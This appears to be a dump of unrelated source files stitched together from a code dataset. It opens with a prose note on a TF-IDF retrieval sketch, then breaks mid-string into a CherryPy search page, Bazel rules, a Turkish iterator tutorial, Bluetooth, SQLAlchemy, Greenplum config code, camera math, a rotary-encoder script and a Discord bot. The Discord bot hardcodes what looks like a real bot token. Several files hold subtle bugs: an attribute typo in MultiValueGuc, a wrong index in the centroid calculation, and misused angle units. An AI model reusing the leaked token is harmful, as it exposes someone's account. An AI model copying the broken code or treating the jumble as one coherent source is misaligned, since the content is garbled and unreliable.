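The Articles.py record retrieves an answer by appending the query to the sentence list, vectorising with TF-IDF, and taking the second-highest cosine score (the highest is the query matching itself). Note that its responce() immediately assigns user_responce = text.lower(), which replaces the query with the whole corpus; the sketch below keeps the two separate. Corpus and query are illustrative.

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

sentences = ["Coronaviruses are a family of viruses.",
             "Symptoms include fever and cough.",
             "Wash your hands regularly."]
query = "what are the symptoms"

tfidf = TfidfVectorizer(stop_words="english").fit_transform(sentences + [query])
scores = cosine_similarity(tfidf[-1], tfidf).flatten()
best = scores[:-1].argmax()            # drop the query's self-similarity of 1.0
print(sentences[best], scores[best])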
\"\"\"\n\n # similarity == matching_trigrams / (len1 + len2 - matching_trigrams)\n\n sql_query = \"\"\"\n SELECT\n word,\n nentry,\n similarity (word, %(word)s) AS sml\n FROM terms\n WHERE word %% %(word)s\n ORDER BY sml DESC, nentry DESC LIMIT %(suggestions)s;\"\"\"\n\n q = os.query.lower ()\n sugg = []\n for word in q.split ():\n if len (word) > 3:\n try:\n rows = BaseSearcher.SQLSearcher().execute (\n sql_query,\n { 'word': word, 'suggestions': max_suggestions_per_word + 1})\n for i, row in enumerate (rows):\n if i >= max_suggestions_per_word:\n break\n corr = row.word\n if corr != word:\n sugg.append ( (word, corr) )\n except DatabaseError:\n pass\n\n for word, corr in reversed (sugg):\n os.entries.insert (0, self.did_you_mean (os, corr, q.replace (word, corr)))\n\n\n\n def index (self, **kwargs):\n \"\"\" Output a search result page. \"\"\"\n\n os = BaseSearcher.OpenSearch ()\n os.log_request ('search')\n\n if 'default_prefix' in kwargs:\n raise cherrypy.HTTPError (400, 'Bad Request. Unknown parameter: default_prefix')\n\n if os.start_index > BaseSearcher.MAX_RESULTS:\n raise cherrypy.HTTPError (400, 'Bad Request. Parameter start_index too high')\n\n sql = BaseSearcher.SQLStatement ()\n sql.query = 'SELECT *'\n sql.from_ = ['v_appserver_books_4 as books']\n\n # let derived classes prepare the query\n try:\n self.setup (os, sql)\n except ValueError as what:\n raise cherrypy.HTTPError (400, 'Bad Request. ' + str (what))\n\n os.fix_sortorder ()\n\n # execute the query\n try:\n BaseSearcher.SQLSearcher ().search (os, sql)\n except DatabaseError as what:\n cherrypy.log (\"SQL Error: \" + str (what),\n context = 'REQUEST', severity = logging.ERROR)\n raise cherrypy.HTTPError (400, 'Bad Request. Check your query.')\n\n # sync os.title and first entry header\n if os.entries:\n entry = os.entries[0]\n if os.title and not entry.header:\n entry.header = os.title\n elif entry.header and not os.title:\n os.title = entry.header\n\n os.template = os.page = 'results'\n\n # give derived class a chance to tweak result set\n self.fixup (os)\n\n # warn user about no records found\n if os.total_results == 0:\n self.nothing_found (os)\n\n # suggest alternate queries\n if os.total_results < 5:\n self.output_suggestions (os)\n\n # add sort by links\n if os.start_index == 1 and os.total_results > 1:\n if 'downloads' in os.alternate_sort_orders:\n self.sort_by_downloads (os)\n if 'release_date' in os.alternate_sort_orders:\n self.sort_by_release_date (os)\n if 'title' in os.alternate_sort_orders:\n self.sort_by_title (os)\n if 'alpha' in os.alternate_sort_orders:\n self.sort_alphabetically (os)\n if 'quantity' in os.alternate_sort_orders:\n self.sort_by_quantity (os)\n\n os.finalize ()\n self.finalize (os)\n\n if os.total_results > 0:\n # call this after finalize ()\n os.entries.insert (0, self.status_line (os))\n\n return self.format (os)\n\n\n @staticmethod\n def sort_by_downloads (os):\n \"\"\" Append the sort by downloads link. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = 'popular'\n cat.title = _('Sort by Popularity')\n cat.url = os.url_carry (sort_order = 'downloads')\n cat.class_ += 'navlink grayed'\n cat.icon = 'popular'\n cat.order = 4.0\n os.entries.insert (0, cat)\n\n @staticmethod\n def sort_alphabetically (os):\n \"\"\" Append the sort alphabetically link. 
\"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = 'alphabethical'\n cat.title = _('Sort Alphabetically')\n cat.url = os.url_carry (sort_order = 'alpha')\n cat.class_ += 'navlink grayed'\n cat.icon = 'alpha'\n cat.order = 4.1\n os.entries.insert (0, cat)\n\n @staticmethod\n def sort_by_title (os):\n \"\"\" Append the sort alphabetically link. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = 'alphabethical'\n cat.title = _('Sort Alphabetically')\n cat.url = os.url_carry (sort_order = 'title')\n cat.class_ += 'navlink grayed'\n cat.icon = 'alpha'\n cat.order = 4.1\n os.entries.insert (0, cat)\n\n @staticmethod\n def sort_by_quantity (os):\n \"\"\" Append the sort by quantity link. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = 'numerous'\n cat.title = _('Sort by Quantity')\n cat.url = os.url_carry (sort_order = 'quantity')\n cat.class_ += 'navlink grayed'\n cat.icon = 'quantity'\n cat.order = 4.2\n os.entries.insert (0, cat)\n\n @staticmethod\n def sort_by_release_date (os):\n \"\"\" Append the sort by release date link. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = 'new'\n cat.title = _('Sort by Release Date')\n cat.url = os.url_carry (sort_order = 'release_date')\n cat.class_ += 'navlink grayed'\n cat.icon = 'date'\n cat.order = 4.3\n os.entries.insert (0, cat)\n\n @staticmethod\n def status_line (os):\n \"\"\" Placeholder for status line. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = '__statusline__'\n cat.class_ += 'grayed'\n cat.icon = 'bibrec'\n cat.order = 10\n cat.header = os.title\n cat.title = _(u\"Displaying results {from_}–{to}\").format (\n from_ = os.start_index, to = os.end_index)\n return cat\n\n @staticmethod\n def no_records_found (os):\n \"\"\" Message. \"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = '__notfound__'\n cat.title = _('No records found.')\n cat.url = os.url ('start')\n cat.class_ += 'navlink grayed'\n cat.icon = 'bibrec'\n cat.order = 11\n return cat\n\n @staticmethod\n def did_you_mean (os, corr, corrected_query):\n \"\"\" Message. 
\"\"\"\n\n cat = BaseSearcher.Cat ()\n cat.rel = '__didyoumean__'\n cat.title = _('Did you mean: {correction}').format (correction = corr)\n cat.url = os.url ('search', query = corrected_query)\n cat.class_ += 'navlink'\n cat.icon = 'suggestion'\n cat.order = 12\n return cat\n","sub_path":"Page.py","file_name":"Page.py","file_ext":"py","file_size_in_byte":9345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"445284468","text":"# -*- python -*-\n\nload(\n \"@com_google_protobuf//:protobuf.bzl\",\n \"cc_proto_library\",\n \"py_proto_library\",\n)\nload(\n \"@drake//tools/skylark:drake_cc.bzl\",\n \"drake_installed_headers\",\n \"installed_headers_for_drake_deps\",\n)\n\ndef drake_cc_proto_library(\n name,\n srcs = [],\n deps = [],\n tags = [],\n **kwargs):\n \"\"\"A wrapper to insert Drake-specific customizations.\"\"\"\n cc_proto_library(\n name = name,\n srcs = srcs,\n tags = tags + [\"nolint\"],\n **kwargs)\n drake_installed_headers(\n name = name + \".installed_headers\",\n hdrs = [s[:-len(\".proto\")] + \".pb.h\" for s in srcs],\n deps = installed_headers_for_drake_deps(deps),\n tags = [\"nolint\"],\n )\n\ndef drake_py_proto_library(\n name,\n tags = [],\n **kwargs):\n \"\"\"A wrapper to insert Drake-specific customizations.\"\"\"\n py_proto_library(\n name = name,\n tags = tags + [\"nolint\"],\n **kwargs)\n","sub_path":"tools/skylark/drake_proto.bzl","file_name":"drake_proto.bzl","file_ext":"bzl","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"205360305","text":"#coding:iso-8859-9 Türkçe\r\n# p_11701.py: for-in-taranabilir(liste, tüple ve dizge), next(iter(taranabilir)) ve taranabilirin Tersten dökümü örneği.\r\n\r\nprint (\"Iterable/tekrarlı liste, tüple ve dizge dökümleri:\\n\", \"-\"*50, sep=\"\")\r\nfor şehir in [\"Ankara\", \"İstanbul\", \"İzmir\", \"Adana\", \"Mersin\"]: print (şehir, end=\", \")\r\nprint()\r\nfor dil in (\"Basic\", \"Fortran\", \"Cobol\", \"PL/I\", \"Pascal\", \"C\", \"Clipper\",\r\n \"Assembler\", \"Java\", \"JavaScript\", \"Python\"): print (dil, end=\", \")\r\nprint()\r\nfor krk in \"Iteration tekrarlanabilir verilerin işlenme süreçleri çok kolaydır.\": print (krk, end=\", \")\r\n#---------------------------------------------------------------------------------------------------\r\n\r\nşehirler = [\"Ankara\", \"İstanbul\", \"İzmir\", \"Adana\", \"Mersin\", \"Eskişehir\"]\r\ntarayıcı = iter (şehirler) # İterable şehirler listesi, \"iter\" hazır fonksiyonuyla tarayıcı nesnesi elemanları oldu...\r\n\r\nprint (\"\\n\\nŞehirler iterator/tarayıcı nesnesi: \", tarayıcı)\r\nprint (\"Next ile iterator/tarayıcı nesne elemanları dökümü: \", end=\"\")\r\nwhile True:\r\n try: print (next (tarayıcı), end=\", \")\r\n except StopIteration: break\r\n#---------------------------------------------------------------------------------------------------\r\n\r\ndef tekrarlanabilirMi (nesne):\r\n try:\r\n iter (nesne)\r\n return True\r\n except TypeError: return False \r\n\r\nprint(\"\\n\")\r\nfor eleman in [34, [4, 5], (4, 5), {\"a\":4}, \"dizge\", 4.5]: # Sayı, liste, tüple, sözlük, dizge, sayı...\r\n print (eleman, \"==>Iterable/tekrarlanabilir tipli mi? 
\", tekrarlanabilirMi (eleman) )\r\n#---------------------------------------------------------------------------------------------------\r\n\r\nclass Tersten: # Verili tekrarlanabiliri tersten taratır...\r\n def __init__ (self, veri):\r\n self.veri = veri\r\n self.endeks = len (veri)\r\n\r\n def __iter__ (self): return self\r\n\r\n def __next__ (self):\r\n if self.endeks == 0: raise StopIteration\r\n self.endeks = self.endeks - 1\r\n return self.veri [self.endeks]\r\n\r\ndef dök():\r\n i = 0\r\n while True:\r\n try: print (i, \":\", next (terstenTarayıcı), sep=\"\", end=\", \")\r\n except StopIteration: break\r\n i +=1\r\n\r\nterstenTarayıcı = Tersten (şehirler)\r\nprint (\"\\nŞehir liste tarayıcısı tersten dökecek: \", end=\"\"); dök()\r\n\r\nterstenTarayıcı = Tersten (range (1957, 2019+1) )\r\nprint (\"\\n\\nŞimdi de yılları geriye doğru dökecek: \", end=\"\"); dök()\r\n\r\n\r\n\"\"\"Çıktı:\r\n>python p_11701.py\r\nIterable/tekrarlı liste, tüple ve dizge dökümleri:\r\n--------------------------------------------------\r\nAnkara, İstanbul, İzmir, Adana, Mersin,\r\nBasic, Fortran, Cobol, PL/I, Pascal, C, Clipper, Assembler, Java, JavaScript, Python,\r\nI, t, e, r, a, t, i, o, n, , t, e, k, r, a, r, l, a, n, a, b, i, l, i, r, , v, e, r, i, l, e, r, i, n, , i, ş, l, e, n, m, e, , s, ü, r, e, ç, l, e, r, i,\r\n, ç, o, k, , k, o, l, a, y, d, ı, r, .,\r\n\r\nŞehirler iterator/tarayıcı nesnesi: \r\nNext ile iterator/tarayıcı nesne elemanları dökümü: Ankara, İstanbul, İzmir, Adana, Mersin, Eskişehir,\r\n\r\n34 ==>Iterable/tekrarlanabilir tipli mi? False\r\n[4, 5] ==>Iterable/tekrarlanabilir tipli mi? True\r\n(4, 5) ==>Iterable/tekrarlanabilir tipli mi? True\r\n{'a': 4} ==>Iterable/tekrarlanabilir tipli mi? True\r\ndizge ==>Iterable/tekrarlanabilir tipli mi? True\r\n4.5 ==>Iterable/tekrarlanabilir tipli mi? 
False\r\n\r\nŞehir liste tarayıcısı tersten dökecek: 0:Eskişehir, 1:Mersin, 2:Adana, 3:İzmir, 4:İstanbul, 5:Ankara,\r\n\r\nŞimdi de yılları geriye doğru dökecek: 0:2019, 1:2018, 2:2017, 3:2016, 4:2015, 5:2014,\r\n6:2013, 7:2012, 8:2011, 9:2010, 10:2009, 11:2008, 12:2007, 13:2006, 14:2005,\r\n15:2004, 16:2003, 17:2002, 18:2001, 19:2000, 20:1999, 21:1998, 22:1997, 23:1996,\r\n24:1995, 25:1994, 26:1993, 27:1992, 28:1991, 29:1990, 30:1989, 31:1988, 32:1987,\r\n33:1986, 34:1985, 35:1984, 36:1983, 37:1982, 38:1981, 39:1980, 40:1979, 41:1978,\r\n42:1977, 43:1976, 44:1975, 45:1974, 46:1973, 47:1972, 48:1971, 49:1970, 50:1969,\r\n51:1968, 52:1967, 53:1966, 54:1965, 55:1964, 56:1963, 57:1962, 58:1961,59:1960,\r\n60:1959, 61:1958, 62:1957,\r\n\"\"\"","sub_path":"Bernd Klein (520) ile Python/p_11701.py","file_name":"p_11701.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"64223497","text":"import bluetooth\r\nimport threading\r\n\r\nimport BlueRecord\r\nimport BlueDetect\r\n\r\ndef main():\r\n PORT = 1\r\n server_sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\r\n server_sock.bind(('', PORT))\r\n server_sock.listen(1) # backlog: 接続待ち受け数\r\n \r\n #Detect = BlueDetect.Detecting()\r\n #Record = BlueRecord.Recording()\r\n \r\n #detect = threading.Thread(target=Detect.detect)\r\n #record = threading.Thread(target=Record.record)\r\n \r\n client_sock, client_addrport = server_sock.accept() # blocking until connection\r\n dalive = False\r\n ralive = False\r\n while True: \r\n data = client_sock.recv(1024)\r\n #print(data) # bytes\r\n rec = data.decode('ascii')\r\n if rec == \"d\":\r\n Detect = BlueDetect.Detecting()\r\n detect = threading.Thread(target=Detect.detect)\r\n detect.start()\r\n dalive = True\r\n \r\n if rec == \"r\":\r\n Record = BlueRecord.Recording()\r\n record = threading.Thread(target=Record.record)\r\n record.start()\r\n ralive = True\r\n \r\n if rec == \"s\":\r\n if dalive:\r\n Detect.set_exit()\r\n detect.join()\r\n dalive = False\r\n if ralive:\r\n Record.set_exit()\r\n record.join()\r\n ralive = False\r\n #Detect.set_exit()\r\n ##Record.set_exit()\r\n print(\"stop\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"rfcomm.py","file_name":"rfcomm.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516444035","text":"from cap7.Ex20SqlAlchemy import Person, Address, engine\nfrom sqlalchemy.orm import sessionmaker\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nanakin = Person(name='Anakin Skywalker', age=32)\nobi1 = Person(name='Obi-Wan Kenobi',age=40)\n\nobi1.addresses = [\n Address(email='obi1@example.com'),\n Address(email='wanwan@example.com'),\n]\n\nanakin.addresses.append(Address(email='ani@example.com'))\nanakin.addresses.append(Address(email='evil.dart@example.com'))\nanakin.addresses.append(Address(email='vader@example.com'))\n\n##session.add(anakin)\n##session.add(obi1)\n##session.commit()\n\nobi1 = session.query(Person).filter(\n Person.name.like('Obi%')\n).first()\nprint(obi1, obi1.addresses)\n\nanakin = session.query(Person).filter(\n Person.name == 'Anakin Skywalker'\n).first()\nprint(anakin, anakin.addresses)\n\nanakin_id = anakin.id\ndel anakin\n\ndef display_info():\n #get all addresses first\n addresses = session.query(Address).all()\n\n #display results\n for address in addresses:\n print(f'{address.person.name} <{address.email}>')\n\n 
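The Tersten class in p_11701.py re-implements reverse iteration that the built-in reversed() already provides for sequences (lists index backwards, and range supports __reversed__ directly):

cities = ["Ankara", "İstanbul", "İzmir", "Adana", "Mersin", "Eskişehir"]
for i, city in enumerate(reversed(cities)):
    print(f"{i}:{city}", end=", ")
print()
for i, year in enumerate(reversed(range(1957, 2020))):
    print(f"{i}:{year}", end=", ")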
print('people: {}, addresses: {}'.format(\n session.query(Person).count(),\n session.query(Address).count()\n ))\n\ndisplay_info()\n\nanakin = session.query(Person).get(anakin_id)\nsession.delete(anakin)\nsession.commit()\n\ndisplay_info()\n","sub_path":"cap7/Ex21SqlAlchemyPersist.py","file_name":"Ex21SqlAlchemyPersist.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"189636188","text":"from gpconfig_modules.database_segment_guc import DatabaseSegmentGuc\nfrom gpconfig_modules.file_segment_guc import FileSegmentGuc\nfrom gpconfig_modules.segment_guc import SegmentGuc\n\n\nclass MultiValueGuc(SegmentGuc):\n \"\"\"\n encapsulate various GUC locations within a given segment.\n A segment can include 2 databases: the primary and a mirror.\n The database value is singular, since we strongly expect the values to be the same, given mirroring.\n However, the file values of primary and mirror can be different. \n So we model this MultiValueGuc object to accept 2 file values, and one database value.\n \"\"\"\n def __init__(self, guc1, guc2):\n \"\"\"\n accept 2 gucs in any order. gucs can be any combination of:\n\n * database guc\n * file guc\n - primary\n - mirror\n * existing comparison guc, with or without mirror\n \"\"\"\n self.primary_file_seg_guc = None\n self.mirror_file_seg_guc = None\n self.db_seg_guc = None\n\n if not guc1 or not guc2:\n raise Exception(\"comparison requires two gucs\")\n\n SegmentGuc.__init__(self, [guc1.context, guc1.name])\n if guc1.context != guc2.context:\n raise Exception(\"Not the same context\")\n\n if isinstance(guc1, MultiValueGuc):\n # copy constructor\n self.db_seg_guc = guc1.db_seg_guc\n self.primary_file_seg_guc = guc1.primary_file_seg_guc\n self.mirror_file_seg_guc = guc1.mirror_file_seg_guc\n\n if isinstance(guc2, MultiValueGuc):\n # copy constructor\n self.db_seg_guc = guc2.db_seg_guc\n self.primary_file_seg_guc = guc2.primary_file_seg_guc\n self.mirror_file_seg_guc = guc2.mirror_file_seg\n\n if isinstance(guc1, FileSegmentGuc):\n if self.primary_file_seg_guc:\n if self.primary_file_seg_guc.dbid == guc1.dbid:\n self.primary_file_seg_guc = guc1\n else:\n self.mirror_file_seg_guc = guc1\n else:\n self.primary_file_seg_guc = guc1\n\n if isinstance(guc2, FileSegmentGuc):\n if self.primary_file_seg_guc:\n if self.primary_file_seg_guc.dbid == guc2.dbid:\n self.primary_file_seg_guc = guc2\n else:\n self.mirror_file_seg_guc = guc2\n else:\n self.primary_file_seg_guc = guc2\n\n if isinstance(guc1, DatabaseSegmentGuc):\n self.db_seg_guc = guc1\n\n if isinstance(guc2, DatabaseSegmentGuc):\n self.db_seg_guc = guc2\n\n def report_success_format(self):\n file_val = self.primary_file_seg_guc.get_value()\n if self.db_seg_guc:\n result = \"%s value: %s | file: %s\" % (self.get_label(), self.db_seg_guc.value, self._use_dash_when_none(file_val))\n else:\n result = \"%s value: %s\" % (self.get_label(), file_val)\n return result\n\n def report_fail_format(self):\n sort_seg_guc_objs = [obj for obj in [self.primary_file_seg_guc, self.mirror_file_seg_guc] if obj]\n sort_seg_guc_objs.sort(key=lambda x: x.dbid)\n\n if self.db_seg_guc:\n report = [self._report_fail_format_with_database_and_file_gucs(seg_guc_obj) for seg_guc_obj in sort_seg_guc_objs]\n else:\n report = [seg_guc_obj.report_fail_format()[0] for seg_guc_obj in sort_seg_guc_objs]\n return report\n\n def _report_fail_format_with_database_and_file_gucs(self, segment_guc_obj):\n return \"[context: %s] [dbid: %s] [name: %s] 
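Ex21SqlAlchemyPersist.py exercises the query/delete cycle against models imported from Ex20SqlAlchemy; a self-contained sketch of the same cycle with a throwaway in-memory model standing in for Person (the declarative_base import path assumes SQLAlchemy 1.4+):

from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.orm import sessionmaker, declarative_base

Base = declarative_base()

class Person(Base):
    __tablename__ = "person"
    id = Column(Integer, primary_key=True)
    name = Column(String)

engine = create_engine("sqlite:///:memory:")
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()

session.add(Person(name="Anakin Skywalker"))
session.commit()

anakin = session.query(Person).filter(Person.name.like("Anakin%")).first()
session.delete(anakin)
session.commit()
print("people:", session.query(Person).count())   # people: 0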
[value: %s | file: %s]\" % (\n self.db_seg_guc.context,\n segment_guc_obj.dbid,\n self.db_seg_guc.name,\n self.db_seg_guc.value,\n self._use_dash_when_none(segment_guc_obj.value))\n\n def _use_dash_when_none(self, value):\n return value if value is not None else \"-\"\n\n\n def is_internally_consistent(self):\n if not self.db_seg_guc:\n return self.compare_primary_and_mirror_files()\n else:\n if self.primary_file_seg_guc is None:\n return True\n if self.primary_file_seg_guc.get_value() is None:\n return True\n result = True\n if self.mirror_file_seg_guc and self.db_seg_guc:\n result = self.mirror_file_seg_guc.value == self.db_seg_guc.value\n if not result:\n return result\n return self.db_seg_guc.value == self.primary_file_seg_guc.value and result\n\n def get_value(self):\n file_value = \"\"\n if self.primary_file_seg_guc:\n file_value = str(self.primary_file_seg_guc.get_value())\n db_value = \"\"\n if self.db_seg_guc:\n db_value = str(self.db_seg_guc.get_value())\n\n return db_value + \"||\" + file_value\n\n def set_mirror_file_segment(self, mirror_file_seg):\n self.mirror_file_seg_guc = mirror_file_seg\n\n def get_primary_dbid(self):\n return self.primary_file_seg_guc.dbid\n\n def set_primary_file_segment(self, guc):\n self.primary_file_seg_guc = guc\n\n def compare_primary_and_mirror_files(self):\n if self.primary_file_seg_guc and self.mirror_file_seg_guc:\n return self.primary_file_seg_guc.get_value() == self.mirror_file_seg_guc.get_value()\n return True\n","sub_path":"gpMgmt/bin/gpconfig_modules/compare_segment_guc.py","file_name":"compare_segment_guc.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"118444380","text":"# calcultates camera view from bounding boc\n\nimport math\n\n# ewwork of\n# scene size is [[x1,y1,z1],[x2,y2,z2]\ndef placed(scene_size, fudge=1.4, fov=30.0, rescale=1000.0):\n # camera location & target\n cnt = centroid(scene_size, rescale)\n cam_t = cnt # [0,0,cnt[2]]\n # calculate fov distance\n distance = -fudge * (sphere(scene_size) / math.sin(fov / (2 * math.pi)))\n # rotate the point but angles\n cam_p = rot(distance / rescale, 45, 45)\n # offset by target move\n cam_p[0] = cam_p[0] + cam_t[0]\n cam_p[1] = cam_p[1] + cam_t[1]\n cam_p[2] = cam_p[2] + cam_t[2]\n # write\n data = {}\n xzy = lambda a: (a[0], a[2], a[1]) # x,z,y coordinates (not x,y,z)\n data[\"camera_target\"] = \",\".join(\"%g\" % (val) for val in xzy(cam_t))\n data[\"camera_pos\"] = \",\".join(\"%g\" % (val) for val in xzy(cam_p))\n # weird threejs cooreds\n # cam_p[1] = -cam_p[1]\n data[\"cam\"] = xyz(cam_p)\n data[\"target\"] = xyz(cam_t)\n data[\"distance\"] = distance\n data[\"sphere\"] = sphere(scene_size)\n return data\n\n\ndef xyz(pos):\n return {\"x\": pos[0], \"y\": pos[1], \"z\": pos[2]}\n\n\ndef centroid(scene_size, rescale):\n x = (scene_size[1][0] + scene_size[0][0]) / 2.0\n y = (scene_size[1][1] + scene_size[0][2]) / 2.0\n z = (scene_size[1][2] + scene_size[0][2]) / 2.0\n return [x / rescale, y / rescale, z / rescale]\n\n\n# calculate the bounding sphere\ndef sphere(scene_size):\n c = centroid(scene_size, 1)\n smin = scene_size[0]\n smax = scene_size[1]\n val = 2 * max(\n [\n hypot(c[0], smin[0]),\n hypot(c[1], smin[1]),\n hypot(c[2], smin[2]),\n hypot(c[0], smax[0]),\n hypot(c[1], smax[1]),\n hypot(c[2], smax[2]),\n ]\n )\n return val\n\n\ndef hypot(a, b):\n c = math.sqrt((a * a) + (b * b))\n return c\n\n\n# rotate point around the origin\ndef rot(d, alpha, beta):\n a = alpha / (2 * 
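Stripped of the primary/mirror bookkeeping, the rule MultiValueGuc encodes is that every recorded value which exists must agree; a reduced sketch with illustrative values:

def consistent(db=None, primary=None, mirror=None):
    seen = [v for v in (db, primary, mirror) if v is not None]
    return all(v == seen[0] for v in seen)

print(consistent(db="on", primary="on", mirror="on"))   # True
print(consistent(db="on", primary="off"))               # False
print(consistent(primary="on"))                         # True, nothing contradicts it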
math.pi)\n b = beta / (2 * math.pi)\n x = d * math.cos(a) * math.cos(b)\n y = d * math.cos(a) * math.sin(b)\n z = d * math.sin(a)\n return [x, y, z]\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"315253051","text":"#!/usr/bin/python3\n# Advanced Rotary Control\n#\n# The idea is to replace all input buttons with just one KY-040.\n#\n# Rotate: Increase/Decrease volume\n# Rotate while pressing: Next/Previous track\n# Short press (without rotating): Pause/Play\n# Long press (5s, without rotating): Shutdown\n#\n# Connect as follows:\n#\n# | KY-040 | RPi |\n# |========|========|\n# | CLK | GPIO 5 |\n# | DT | GPIO 6 |\n# | SW | GPIO 3 |\n# | + | 3.3V |\n# | GND | GND |\n#\n\nimport pigpio\nimport time\nimport signal\nfrom subprocess import check_call\n\n\ndef trigger_held(signal, frame):\n check_call(\"./scripts/playout_controls.sh -c=shutdown\", shell=True)\n\n\ndef check_rotation(gpio, level, tick):\n global encoder_rotate_time, encLevA, encLevB, lastEncPin\n if level > 1:\n return\n if gpio == encPinA:\n encLevA = level\n else:\n encLevB = level\n if gpio == lastEncPin: # debounce\n return\n lastEncPin = gpio\n signal.alarm(0)\n encoder_rotate_time = time.time()\n pressed = not bool(pi.read(3))\n if gpio == encPinA and level == 1:\n if encLevB == 1:\n if pressed:\n check_call(\"mpg123 ./misc/sounds/BubblePo-Benjamin-8920_hifi.mp3\", shell=True)\n check_call(\"./scripts/playout_controls.sh -c=playernext\", shell=True)\n else:\n check_call(\"./scripts/playout_controls.sh -c=volumeup\", shell=True)\n elif gpio == encPinB and level == 1:\n if encLevA == 1:\n if pressed:\n check_call(\"mpg123 ./misc/sounds/Pop-J_Fairba-8421_hifi.mp3\", shell=True)\n check_call(\"./scripts/playout_controls.sh -c=playerprev\", shell=True)\n else:\n check_call(\"./scripts/playout_controls.sh -c=volumedown\", shell=True)\n\n\ndef trigger_released(gpio, level, tick):\n global trigger_press_time, encoder_rotate_time\n signal.alarm(0)\n if encoder_rotate_time < trigger_press_time:\n check_call(\"./scripts/playout_controls.sh -c=playerpause\", shell=True)\n\n\ndef trigger_pressed(gpio, level, tick):\n global trigger_press_time\n trigger_press_time = time.time()\n signal.alarm(5)\n\n\ndef exit_handler(signal, frame):\n exit(0)\n\n\nsignal.signal(signal.SIGINT, exit_handler)\nsignal.signal(signal.SIGTERM, exit_handler)\nsignal.signal(signal.SIGALRM, trigger_held)\n\nencoder_rotate_time = trigger_press_time = time.time()\n\npi = pigpio.pi()\n\nencPinA = 5\nencPinB = 6\n\nif pi.get_mode(encPinA) != pigpio.INPUT:\n pi.set_mode(encPinA, pigpio.INPUT)\n pi.set_pull_up_down(encPinA, pigpio.PUD_UP)\n pi.set_glitch_filter(encPinA, 30)\n\nif pi.get_mode(encPinB) != pigpio.INPUT:\n pi.set_mode(encPinB, pigpio.INPUT)\n pi.set_pull_up_down(encPinB, pigpio.PUD_UP)\n pi.set_glitch_filter(encPinB, 30)\n\nif pi.get_mode(3) != pigpio.INPUT:\n pi.set_mode(3, pigpio.INPUT)\n pi.set_pull_up_down(3, pigpio.PUD_UP)\n pi.set_glitch_filter(3, 300)\n\nencLevA = pi.read(encPinA)\nencLevB = pi.read(encPinB)\nlastEncPin = None\n\npi.callback(3, pigpio.FALLING_EDGE, trigger_pressed)\npi.callback(3, pigpio.RISING_EDGE, trigger_released)\npi.callback(5, pigpio.EITHER_EDGE, check_rotation)\npi.callback(6, pigpio.EITHER_EDGE, check_rotation)\n\nwhile True:\n 
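placed() above sizes the camera distance so the scene's bounding sphere fills the field of view, but it divides the angle by 2*pi instead of converting degrees to radians. The textbook relation is d = r / sin(fov/2) with the half-angle in radians; a sketch, assuming fov arrives in degrees as the default of 30.0 suggests:

import math

def fit_distance(radius, fov_deg=30.0, fudge=1.4):
    half_fov = math.radians(fov_deg) / 2.0
    return fudge * radius / math.sin(half_fov)

print(fit_distance(radius=5.0))   # distance keeping a radius-5 sphere in frame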
signal.pause()\n","sub_path":"scripts/advanced-rotary-control.py","file_name":"advanced-rotary-control.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"307633833","text":"import discord\r\nimport os\r\nfrom discord.ext import commands, tasks\r\nfrom itertools import cycle\r\n\r\n\r\ntoken = 'NjE2MjY2NjY1Njc5NzgxOTA4.XYZjRA.e9xPeTdEo9GQvL2xgoSPSCaZ79s'\r\nstatus = cycle(['Under development','Hosted by Dirt Master#3923','Developed by: Aidas#0666'])\r\nallowed = ['joins', 'leaves']\r\n\r\nclient = commands.Bot(command_prefix = '-')\r\n\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n\tprint('Alpaca has been launched!')\r\n\tchange_status.start()\r\n\r\n@client.event\r\nasync def on_guild_join(guild):\r\n os.mkdir('logs\\guilds\\{0}-{1}'.format(guild.name,guild.id))\r\n print('I have been invited to {0} ({1})'.format(guild.name,guild.id))\r\n await guild.system_channel.send('Thanks for inviting me to your server! I promise i will do my best to make ur server awesome! :heart:')\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n print(f\"{member} has joined a guild\")\r\n f = open('logs\\guilds\\{0}-{1}\\joinlogs.txt'.format(member.guild.name,member.guild.id), 'a')\r\n f.write('A user ({0}) joined {1} ({2})\\n'.format(member,member.guild.name,member.guild.id))\r\n f.close()\r\n\r\n@client.event\r\nasync def on_member_remove(member):\r\n print(f\"{member} has been removed/kicked from the guild\")\r\n f = open('logs\\guilds\\{0}-{1}\\leavelogs.txt'.format(member.guild.name,member.guild.id), 'a')\r\n f.write('A user ({0}) has been kicked/removed from \\n Guild_name: {1} \\n Guild_ID: {2}\\n'.format(member.guild.id,member.guild.name,member.guild.id))\r\n f.close()\r\n\r\n@client.command()\r\nasync def ping(ctx):\r\n\tawait 